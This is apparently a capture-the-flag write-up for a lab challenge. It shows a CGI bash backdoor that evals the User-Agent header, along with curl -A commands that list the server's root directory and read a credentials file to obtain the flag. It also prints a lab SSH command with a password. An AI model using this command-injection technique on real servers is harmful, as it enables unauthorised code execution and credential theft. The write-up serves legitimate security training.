HomeBlogGithub

Find The Flag 2

~# cat Question

You have found a secret backdoor into the machine, but how do you operate it?

Could you possibly find a way to use the backdoor to find the secret password to access the machine?

You will know the flag when you find the secret password!

ssh -p 4524 -J team_o51G0@users.ncl.sg team_o51G0@172.18.178.17 0x@NSS5JvwmPRQrd9D

From the previous part, when we curl the website's robots.txt page, we can see one page (/cgi-bin/parameterbackdoor.sh) that is disallowed. We can navigate to that page.

team_o51G0@tx-vm:~$ curl 200.200.200.168/cgi-bin/parameterbackdoor.sh
#!/bin/bash

# Get the command from the query string parameter "cmd"
command="$HTTP_USER_AGENT"

#Run the command and capture the output
output=$(eval "$command" 2>&1)

# Output the result as a response
echo "Content-type: text/plain"
echo

$command >/dev/null

if [ $? -ne 0 ]; then
        echo "$(<parameterbackdoor.sh)"
else
        echo "You set the correct parameter, this is the result:"
        echo "$output"
fi

Sending commands to the web server

When we navigate to this page, there is this script that hints at us to run commands to the web server, which makes it very insecure.

In short, it blindly executes commands based on the User-Agent header ⎯ It takes a command from the User-Agent HTTP header, executes it, and returns the output as an HTTP response. We can exploit this by sending different commands and seeing what it returns us.

  • We can utilize the -A flag to specify the user agent string. In this case, the user agent string is set to ls /, which is a Unix command typically used to list directory contents.

We will get back different files of the web server.

team_o51G0@tx-vm:~$ curl 200.200.200.168/cgi-bin/parameterbackdoor.sh -A "ls /"
You set the correct parameter, this is the result:
bin
boot
cdrom
credentials.txt
dev
etc
flag.txt
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swapfile
sys
tmp
usr
var

Files on the web server

We can see two interesting files (credentials.txt & flag.txt). Opening flag.txt yields us nothing.

team_o51G0@tx-vm:~$ curl 200.200.200.168/cgi-bin/parameterbackdoor.sh -A "cat /flag.txt"
#!/bin/bash

# Get the command from the query string parameter "cmd"
command="$HTTP_USER_AGENT"

#Run the command and capture the output
output=$(eval "$command" 2>&1)

# Output the result as a response
echo "Content-type: text/plain"
echo

$command >/dev/null

if [ $? -ne 0 ]; then
        echo "$(<parameterbackdoor.sh)"
else
        echo "You set the correct parameter, this is the result:"
        echo "$output"
fi

However, opening credentails.txt gives us the flag.

team_o51G0@tx-vm:~$ curl 200.200.200.168/cgi-bin/parameterbackdoor.sh -A "cat /credentials.txt"
You set the correct parameter, this is the result:
Some careless user record their password here and forget to delete. 
The flag for part 2 is the password, remember to wrap it in the flag format. i.e. flag{PASSWORD}

Password: b@rrow-wight

Flag: flag{b@rrow-wight}

PreviousFind The Flag 1Nextgive it your all

Last updated